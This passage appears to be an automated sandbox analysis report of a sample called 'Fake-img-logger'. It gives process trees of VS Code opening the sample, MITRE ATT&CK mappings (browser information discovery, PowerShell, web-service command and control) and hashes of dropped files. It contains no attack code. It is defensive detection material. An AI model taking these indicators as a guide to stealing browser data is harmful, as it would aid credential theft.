  C:\Windows\System32\wsl.exe --status
  2⤵
  PID:6384
- C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe
  "C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe" --type=utility --utility-sub-type=node.mojom.NodeService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --user-data-dir="C:\Users\Admin\AppData\Roaming\Code" --standard-schemes=vscode-webview,vscode-file --enable-sandbox --secure-schemes=vscode-webview,vscode-file --cors-schemes=vscode-webview,vscode-file --fetch-schemes=vscode-webview,vscode-file --service-worker-schemes=vscode-webview --code-cache-schemes=vscode-webview,vscode-file --field-trial-handle=4180,i,15733205967221230082,2459924531789789485,262144 --disable-features=CalculateNativeWinOcclusion,PlzDedicatedWorker,SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=3996 /prefetch:14
  2⤵
  - Executes dropped EXE
  PID:6840

C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe
"C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe" "C:\Users\Admin\AppData\Local\Temp\Temp1_Fake-img-logger-main.zip\Fake-img-logger-main\config.json"
1⤵
- Executes dropped EXE
- Drops file in Windows directory
- Checks processor information in registry
PID:5772
- C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe
  "C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Roaming\Code /prefetch:4 --no-rate-limit --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Roaming\Code\Crashpad --url=appcenter://code?aid=a4e3233c-699c-46ec-b4f4-9c2a77254662&uid=ac291b90-2c6c-42c4-ac69-2024a0880230&iid=ac291b90-2c6c-42c4-ac69-2024a0880230&sid=ac291b90-2c6c-42c4-ac69-2024a0880230 --annotation=_companyName=Microsoft --annotation=_productName=VSCode --annotation=_version=1.98.0 --annotation=plat=Win64 --annotation=prod=Electron --annotation=ver=34.2.0 --initial-client-data=0x470,0x474,0x478,0x46c,0x47c,0x7ff6fdc7b534,0x7ff6fdc7b540,0x7ff6fdc7b550
  2⤵
  - Executes dropped EXE
  PID:6260
- C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe
  "C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\Code" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1820,i,15750011081795604440,15420401339813819964,262144 --disable-features=CalculateNativeWinOcclusion,PlzDedicatedWorker,SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1812 /prefetch:2
  2⤵
  - Executes dropped EXE
  PID:6464
- C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe
  "C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\Code" --standard-schemes=vscode-webview,vscode-file --enable-sandbox --secure-schemes=vscode-webview,vscode-file --cors-schemes=vscode-webview,vscode-file --fetch-schemes=vscode-webview,vscode-file --service-worker-schemes=vscode-webview --code-cache-schemes=vscode-webview,vscode-file --field-trial-handle=1832,i,15750011081795604440,15420401339813819964,262144 --disable-features=CalculateNativeWinOcclusion,PlzDedicatedWorker,SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1952 /prefetch:11
  2⤵
  - Executes dropped EXE
  PID:6456
- C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe
  "C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\Code" --standard-schemes=vscode-webview,vscode-file --enable-sandbox --secure-schemes=vscode-webview,vscode-file --cors-schemes=vscode-webview,vscode-file --fetch-schemes=vscode-webview,vscode-file --service-worker-schemes=vscode-webview --code-cache-schemes=vscode-webview,vscode-file --app-user-model-id=Microsoft.VisualStudioCode --app-path="C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\resources\app" --enable-sandbox --enable-blink-features=HighlightAPI --disable-blink-features=FontMatchingCTMigration,StandardizedBrowserZoom, --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --field-trial-handle=3040,i,15750011081795604440,15420401339813819964,262144 --disable-features=CalculateNativeWinOcclusion,PlzDedicatedWorker,SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=3036 --vscode-window-config=vscode:30a151df-f04e-45c1-84be-141577a2882d /prefetch:1
  2⤵
  - Executes dropped EXE
  PID:6084
- C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe
  "C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe" --type=utility --utility-sub-type=node.mojom.NodeService --lang=en-US --service-sandbox-type=none --dns-result-order=ipv4first --inspect-port=0 --video-capture-use-gpu-memory-buffer --user-data-dir="C:\Users\Admin\AppData\Roaming\Code" --standard-schemes=vscode-webview,vscode-file --enable-sandbox --secure-schemes=vscode-webview,vscode-file --cors-schemes=vscode-webview,vscode-file --fetch-schemes=vscode-webview,vscode-file --service-worker-schemes=vscode-webview --code-cache-schemes=vscode-webview,vscode-file --field-trial-handle=3736,i,15750011081795604440,15420401339813819964,262144 --disable-features=CalculateNativeWinOcclusion,PlzDedicatedWorker,SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=3740 /prefetch:14
  2⤵
  - Executes dropped EXE
  PID:6940
- - C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe
    "C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe" --max-old-space-size=3072 "c:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\node_modules\typescript\lib\tsserver.js" --serverMode partialSemantic --useInferredProjectPerProjectRoot --disableAutomaticTypingAcquisition --cancellationPipeName C:\Users\Admin\AppData\Local\Temp\vscode-typescript\5b09e216f5a4e93c75c9\tscancellation-4b127664dda2cb5e00b5.tmp* --locale en --noGetErrOnBackgroundUpdate --canUseWatchEvents --validateDefaultNpmLocation --useNodeIpc
    3⤵
    - Executes dropped EXE
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:2792
- - C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe
    "C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe" --max-old-space-size=3072 "c:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\node_modules\typescript\lib\tsserver.js" --useInferredProjectPerProjectRoot --enableTelemetry --cancellationPipeName C:\Users\Admin\AppData\Local\Temp\vscode-typescript\5b09e216f5a4e93c75c9\tscancellation-85c148743c03c00e3e5e.tmp* --locale en --noGetErrOnBackgroundUpdate --canUseWatchEvents --validateDefaultNpmLocation --useNodeIpc
    3⤵
    - Executes dropped EXE
    PID:4920
  - - C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe
      "C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe" "c:/Users/Admin/AppData/Local/Programs/Microsoft VS Code/resources/app/extensions/node_modules/typescript/lib/typingsInstaller.js" --globalTypingsCacheLocation C:/Users/Admin/AppData/Local/Microsoft/TypeScript/5.8 --enableTelemetry --typesMapLocation "c:/Users/Admin/AppData/Local/Programs/Microsoft VS Code/resources/app/extensions/node_modules/typescript/lib/typesMap.json" --validateDefaultNpmLocation
      4⤵
      Executes dropped EXE
      System Network Configuration Discovery: Internet Connection Discovery
      PID:5512
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "npm install --ignore-scripts types-registry@latest"
        5⤵
        
        PID:3356
- - C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe
    "C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe" "c:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\json-language-features\server\dist\node\jsonServerMain" --node-ipc --clientProcessId=6940
    3⤵
    - Executes dropped EXE
    PID:5256
- C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe
  "C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe" --type=utility --utility-sub-type=node.mojom.NodeService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --user-data-dir="C:\Users\Admin\AppData\Roaming\Code" --standard-schemes=vscode-webview,vscode-file --enable-sandbox --secure-schemes=vscode-webview,vscode-file --cors-schemes=vscode-webview,vscode-file --fetch-schemes=vscode-webview,vscode-file --service-worker-schemes=vscode-webview --code-cache-schemes=vscode-webview,vscode-file --field-trial-handle=3856,i,15750011081795604440,15420401339813819964,262144 --disable-features=CalculateNativeWinOcclusion,PlzDedicatedWorker,SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=3852 /prefetch:14
  2⤵
  - Executes dropped EXE
  PID:6984
- - \??\c:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\bin\code-tunnel.exe
    "c:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\bin\code-tunnel.exe" tunnel status
    3⤵
    - Executes dropped EXE
    PID:3208
- C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe
  "C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe" --type=utility --utility-sub-type=node.mojom.NodeService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --user-data-dir="C:\Users\Admin\AppData\Roaming\Code" --standard-schemes=vscode-webview,vscode-file --enable-sandbox --secure-schemes=vscode-webview,vscode-file --cors-schemes=vscode-webview,vscode-file --fetch-schemes=vscode-webview,vscode-file --service-worker-schemes=vscode-webview --code-cache-schemes=vscode-webview,vscode-file --field-trial-handle=3864,i,15750011081795604440,15420401339813819964,262144 --disable-features=CalculateNativeWinOcclusion,PlzDedicatedWorker,SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=3860 /prefetch:14
  2⤵
  - Executes dropped EXE
  PID:4240
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wsl.exe -l -q"
  2⤵
  PID:7092
- - C:\Windows\system32\wsl.exe
    wsl.exe -l -q
    3⤵
    PID:6564
- C:\Windows\System32\wsl.exe
  C:\Windows\System32\wsl.exe --status
  2⤵
  PID:3056
- C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe
  "C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe" --type=utility --utility-sub-type=node.mojom.NodeService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --user-data-dir="C:\Users\Admin\AppData\Roaming\Code" --standard-schemes=vscode-webview,vscode-file --enable-sandbox --secure-schemes=vscode-webview,vscode-file --cors-schemes=vscode-webview,vscode-file --fetch-schemes=vscode-webview,vscode-file --service-worker-schemes=vscode-webview --code-cache-schemes=vscode-webview,vscode-file --field-trial-handle=4168,i,15750011081795604440,15420401339813819964,262144 --disable-features=CalculateNativeWinOcclusion,PlzDedicatedWorker,SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=4176 /prefetch:14
  2⤵
  - Executes dropped EXE
  PID:5784

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Subvert Trust Controls

T1553

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Discovery

Browser Information Discovery

T1217

Network Share Discovery

T1135

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\.vscode\argv.json

Filesize
798B

MD5
e825faf776f0485e6ccd14ec3de274b1

SHA1
29ff469a466034a9dbbf794cf2de6a8bdf7494b6

SHA256
9b4bbdd39e9c5a068d4745fd235702325c5982a46457657578b5baf1767a219b

SHA512
082acd7263ea3c03126a41464b225ae3b25dec9cfe4746986cbc4834ca26c399436f12e6d159c14a56f5c010f34ba7fa9aa2de66f46edb2eb81d2652ce9ed415

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

Filesize
64KB

MD5
b5ad5caaaee00cb8cf445427975ae66c

SHA1
dcde6527290a326e048f9c3a85280d3fa71e1e22

SHA256
b6409b9d55ce242ff022f7a2d86ae8eff873daabf3a0506031712b8baa6197b8

SHA512
92f7fbbcbbea769b1af6dd7e75577be3eb8bb4a4a6f8a9288d6da4014e1ea309ee649a7b089be09ba27866e175ab6f6a912413256d7e13eaf60f6f30e492ce7f

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

Filesize
4B

MD5
f49655f856acb8884cc0ace29216f511

SHA1
cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

SHA256
7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

SHA512
599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

Filesize
1008B

MD5
d222b77a61527f2c177b0869e7babc24

SHA1
3f23acb984307a4aeba41ebbb70439c97ad1f268

SHA256
80dc3ffa698e4ff2e916f97983b5eae79470203e91cb684c5ccd4ff1a465d747

SHA512
d17d836ea77aeaff4cd01f9c7523345167a4a6bc62528aac74acde12679f48079d75d159e9cea2e614da50e83c2dcd92c374c899ea6c4fe8e5513d9bf06c01ff

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

Filesize
40B

MD5
13cd316c3cd36912899d411fc9c4bc5a

SHA1
fb0f6c4f37918a07cbc5510076cbd343ec9c9c97

SHA256
70dbdc7020538dff2e9305dd4665695f9355cd4d74c03ef70d90e1e93a48ab09

SHA512
39ebf02be73acfb584076409cb9cce6fb354604b71a0568d75419657ac908dda618d76700c8261ea58c260a254c6f7504a5622639553c0bd06ded9832c6a6005

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\4693d26a-b979-47b4-8915-19e9023d27e3.tmp

Filesize
13KB

MD5
b705167ebe920671524f5133842dcf54

SHA1
f8801e2fc892075ca79fce265e2c8219bec99b95

SHA256
a6a0d74d23655557586b5c6af1395856229ad9822592f88ec22fa391468c3c4e

SHA512
5d76906f5d23dee742171a95e44ee9eeb8123d9a2d7d1087909dcbd6389c1880698b08b9fa950d13802282fd9d55f1496a0f634813b4ad52f9160888b7a316ff

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
7a5aead59696fbac49e860975605459b

SHA1
5459073f652f1386e92bff6cef76fd8a436ef20a

SHA256
2d2a516a6c0b82a974a7d70929908d6b237cd6414ada422b4deffecd71ed5649

SHA512
29e499771cc5f3dadd5663bec3e93ff89dcc08ed4b52057a918df0191d60a054a0d76672d72c428c4ed79c2cecad03074b1c3649a14520356d3a1bac64ea21ed

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_0

Filesize
44KB

MD5
5d2bb615229f7c3e0338789cabb3da30

SHA1
914a8d533fb6cdc3bb9a28892b376c18cf3ff913

SHA256
45be6cc5e7049728444fa4f3913ca3d2fd9ffc8950f415744a2f0e2db47f7ae0

SHA512
6f13e8ed2cf9f55cc7740a6eae4cb4bafc8bd5dff0fb88347b91d98d7d85b0b2bb4cf2c7f42b96a9cbf87e9637a0147aa207daf7c3426e5275ed01ff3756802b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_1

Filesize
264KB

MD5
e3328b3649e0f3501d89d1fb43e945a6

SHA1
32a2a46f4f2d52b9888a9a7f3ccf94528c0e945a

SHA256
795bbd7cbe935c6026bf110784b155469c224b53accb9f53eb5d4412654c01eb

SHA512
dc800e0ec26b42d42d9fe61266988c55d9978f77d5d5df149367930ebb039f0545086b7cef36027d31853753cb327bdaf1a4a433389dca9e8c9ca626c554db18

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000006

Filesize
62KB

MD5
9ecd937e59f04291b27f9a13bcecebea

SHA1
bf80a4445a01d7a429910f6800b94b2de5739072

SHA256
3093793a6f48bbdb0346098aeae29056719507430374f26de550bb1d033e5ce7

SHA512
016ec055e22bc995a9a7670864aaccdd4600016d8f2c56e06e459630f7cf1b9f338f2e7987f07be440ed50081163a703ef61db71625bdd09f5bd437f95d00eb9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000007

Filesize
38KB

MD5
0dc52d5156e0e3423a20671f85112a3a

SHA1
de63219e966279d23d5d9ebfb2e3c0f612a814a0

SHA256
55d8d47f45278ed4e61568932abc7dbbf8111bfd5f815a5ff0b90120c238551f

SHA512
de91420efb3a68512d862d59b478da2cca7e5ef10d8f79c960f682fcad5ea91146bb609cc15f2349affdd6f6a7369f24e8c4bee7b35f41f31eee53dd3bbf6fb6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000079

Filesize
98KB

MD5
0a9288395cc9daf7acd689d55cca1c7f

SHA1
84f02060b524b8ca0d4c13767ec18f8b8dd0bd4d

SHA256
b4383e706796f5df0f7684fbec88930d595e0d03c457bb1efa637d82dcd49349

SHA512
599f08f0e7360a1a4495685ad710b2e5759fd195458df81bd950be3ab4d4406a2fbaa1da8a5e87680ceadfca13f851e494b581fae22a907bf51cb492feead70a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00007e

Filesize
24KB

MD5
87c2b09a983584b04a63f3ff44064d64

SHA1
8796d5ef1ad1196309ef582cecef3ab95db27043

SHA256
d4a4a801c412a8324a19f21511a7880815b373628e66016bc1785a5a85e0afb0

SHA512
df1f0d6f5f53306887b0b16364651bda9cdc28b8ea74b2d46b2530c6772a724422b33bbdcd7c33d724d2fd4a973e1e9dbc4b654c9c53981386c341620c337067

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000080

Filesize
71KB

MD5
2d5b452e2c8c483d5a93f7764f3c27e3

SHA1
bf8cf58de6e58871a5eaa9bab052a1750a9cef61

SHA256
0d4caa8036947c4d1e0a21c46bf6de7913237d581c6a9e53ced77fb377de0046

SHA512
8750a7ce771731d1870b9d569a9f3df0faa67eb707d4f64171db069198b11b3254dd2bc50db061560ace5988603102cb0d5350118cce58f8e03a8f95acc1d4aa

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00009d

Filesize
16KB

MD5
a1bbfe28d7630972e6eba4f83d0aee15

SHA1
681f4bdee7ed45ecee017f04216393194878bec6

SHA256
b710a678d8f2c55ebe22784be7f69d3402d63b366e9edc19bc4879624462bc8b

SHA512
aa8cbdfc987e77530ab87f0a93a457b755a336c26ad5b735f66a498672f8ab94442bd8e39b6893f25e90d161da87d01a44eb99c0e868cdfee7a71f445b62e7d8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00009f

Filesize
30KB

MD5
7b7ee84076ec2c6e7ef64068f1cf501d

SHA1
c5e18ad576db29fa9e4e7ef649bb7e1738a0ef7c

SHA256
4f7373ff1c499c8f787ac0f9ada78a3a664c0adac25463a0070a0879f3435477

SHA512
17812d0b921f7db34f1a1706a952974eb6d64a7e50c0321557d0f6f961c5c2d85e641346d6ad7e27f6626a398376138d441debda05751d7da7de960288844460

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_0000c7

Filesize
77KB

MD5
081aec3356a250362f93d258674aa12b

SHA1
139ca86e2922d4a070d7293f8917d02ff9a672af

SHA256
b3a816f23b0726374aa5ab3be9913379045bdbed9ce4d7e018b449d6b4bd84e7

SHA512
e054e6936bbe9ada692f372337997a94880c19bfafa2cdb6cba83b5c26ddfcdbe9190d04e869ca24788c5b7feb91d1228ccea52bd5c7229dee9d071aabf624ca

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000104

Filesize
414KB

MD5
b5042ca4497c1e791aea54a3bb882231

SHA1
11c0fc5e1420f67ed39c8e04feb634c7f0dda98f

SHA256
5e6ee06119985c5dcd4ec108b8f91144e7634645b8c9c277c101cb76e3dfd8ac

SHA512
a093b69b0f9ce3cdba2eb738c69ca23781af0e47ae81fc0903f5f4c62c3b333619512f1d578bfdfcf77e749b03ccb0c56ba59ef02d8056b44d43ef0c40877131

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000106

Filesize
83KB

MD5
eca7558e7afeda420ad2ff820dd32cdf

SHA1
e70fd5ea16a4761119a7758f8575e638cda7e35d

SHA256
7abd723e027ba0d376a9238b05880492ac6207997c0a559c326641a81d67c938

SHA512
2a807681be689afd4a47bcba91ee2aba6e41b5ff3eb25f5810be3ae88c38c93345acad82369b6cb4ac7bfffb0a0ffc52039352c25040db809384d8da957746c4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\temp-index

Filesize
7KB

MD5
8dca35dda681384cd8cf5bf805295cc0

SHA1
147812e8c39aa1eb7dc099a41441b81b1c4bf7d5

SHA256
be08d0dac057ff51e6332d83d2ec22a29920eff1e6caf2d0595e653656ac6a94

SHA512
82c2c2a8618d0bfff80ab7f545fd34f543570014ef559e807b43412c63c2c11b42f702e2d42894002b3ce6d5a1580a9019eaee0f6ebc954202d5a7eda7dd6896

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
3KB

MD5
307c0ec09c8a3160d9cb97afa8d66415

SHA1
b4c6b9f1916f2d796ac1016e81418f2b5972d80a

SHA256
0df5191320d01b7543f80e69557b054220ae6925b5823f4f72d4d20e2c6b3e30

SHA512
d6edc488ca61df35636e7fb2e40a385cbfbcf556030804a5ae50f99241455e08ab506c9a03dcce2e5c33dda1224d01652daab76fd91e070b5af1e766505dcb9d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
3KB

MD5
79ab2d492f8d17aebb1ab2e17e103a5b

SHA1
395487732e9ef1a09c3dd1f0f1cb05202401b440

SHA256
7af492eea90028acc692090488d5f728c8f327f28e865a4317f6a470d12fa2f8

SHA512
f93170d6ad12b4eb5d6a442ef330806932fccddfd4b59e7641d1bf99fedd7deb299545f16fe613f6df7337fa3be48f1d6a6203aff1f1f7696e7dba8e6a2c2aa4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
5KB

MD5
c45626b2886f4948519155b7f7296d08

SHA1
661d0f6ea65db67aaf7f0f01eaff9b38e610acb1

SHA256
de3613d1906d014cbf13bf1967c32521bdf0dba490516f90a2eb85336fe097eb

SHA512
ca337f63a3266dbe303e98a0484225d8586c59cbebae0816de242e6a877d13dbbe1fd2c393c94446ed9441462b3be7256ec09345537c9fb8a92e3bc3341dc830

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
9KB

MD5
b22cd747d4d49a36dfee850e34548a09

SHA1
7a8a564e15b5151473283d601e019fca086aad61

SHA256
77a166a81d88a70e02a491b37db13d6899097d4c24ec60386c2f08604542cf8d

SHA512
a154f5305d0b89e5a917ea536528245819611858746d9bb886bd673708965710372ed2fae3cf8b50eb35b0f1bb3e970149e9f6b17a0840ab5b0aa002a6b75fe6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
8KB

MD5
8195b99c69be31357a4b1e5359aebbf0

SHA1
5aca38b9975906683ff7cdc625623352d838627e

SHA256
ca624700ae0541fa787faa0445dc47f2849fde8318496c97a72dc15547169b10

SHA512
a7991faac53be07ecd7e67f84530ddfe9edce11f5e390563e3de84b70d91aa12403f2d0b684716c7834f847cc6cd24a75118a74e08cdb96aeae5b91dd53c3a6b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
6KB

MD5
81464fa6119994453ed32bdd030abba9

SHA1
259b117166abf0562ea5713135d9c97ffcfa85a3

SHA256
aa031376bdf7f1bb1782e605166f6f0a59b29648dd26b929f713b2243b99a8f7

SHA512
ac5cda0322271ead60ba5e9ccc09451bc28cc37a188963a3fbdb15bdd0d60544b1a7c7596a1f61a34bf38d2035e978db6591dab7c5a0d099cb873643a9599a25

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
9KB

MD5
e692b5d31b998ce2b924ae4e6d6b81b1

SHA1
79a9abf10f0e578543a212e86f6037304dffab83

SHA256
bfeaadb1c89075d3bceae7d612d1fee94984106d2ba30e6d28b1dfecf989dbbb

SHA512
bd23a47266e9571605f0f293d29ba61a15d00f769876e296908da644d40db37f174419b57849950e9d9894834fa6e2aeb0d95e6f6bcca1361dba4a29863a3683

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
9KB

MD5
beedb3879b22fa26aefae1483684e1ec

SHA1
dadbd8db9ed5eb6d9995fa4daeb34cb8afcb6d25

SHA256
01b395c2929d726e864671be13d86d3bd06ba94a578d9eaaa12cb553dcc3339a

SHA512
4193656e1e2f7a89db4aa2f469026c403c66fd3e56e6179c3e0de6af4957256762a35a591586d106aa5f228d1556d6807a445948819bd113324d9fad3f853c28

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
9KB

MD5
0736f1383b540988d4fd7b171beb8f4c

SHA1
7b12cf5d9b710ff5a50ce34e78f3c952f62af8fd

SHA256
98d448fef236cfcdd2eef96f69080e8b38443772cdfda26a6d35c79e2e6f4d43

SHA512
1faefb135b7ded073270432dd31b4432c4b65ffc93f01b1bbc15b264b4642c26bb512f355b983ff88d4288fee96e8c9b6ac0501f81dd677d9347ff4b264c88d8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
5KB

MD5
83b5620840d9ceed27e365b50a506ce4

SHA1
9ddbdbebf393e784e22967e025d986e0eadabcc1

SHA256
a9f3ea4d0dbdd76a3aceb2a8514c61be96493baeca8254fe1d48fe93f3c59f1f

SHA512
6eebc13f74e995b592e2ba73b24d25fb25392eeae4ff992ebec574d2d7b55b6af76e41619a5ca6a663b8522ace0058a98237996ca0753d5b05123282d5123b41

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
5KB

MD5
6e722d1cc34d81f31a8713b86d9146d0

SHA1
7627303b2b787a2ed7a2de8704bf4f118fd30e71

SHA256
d77fe1b1fb8cc923c4ecb609f7324ae02b3fb8ae5d5ef586700c0deb35021902

SHA512
4c6c21b4d4a0c08e87932e594719c6e9f4217857519ae52cb6fbdab08bd7cf8001a05d6f99a05854b860e1b2cf52c9e1d48dc8b1163ef7d5ba4b9596a7c6dd93

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\000003.log

Filesize
399B

MD5
a15ac2782bb6b4407d11979316f678fd

SHA1
b64eaf0810e180d99b83bba8e366b2e3416c5881

SHA256
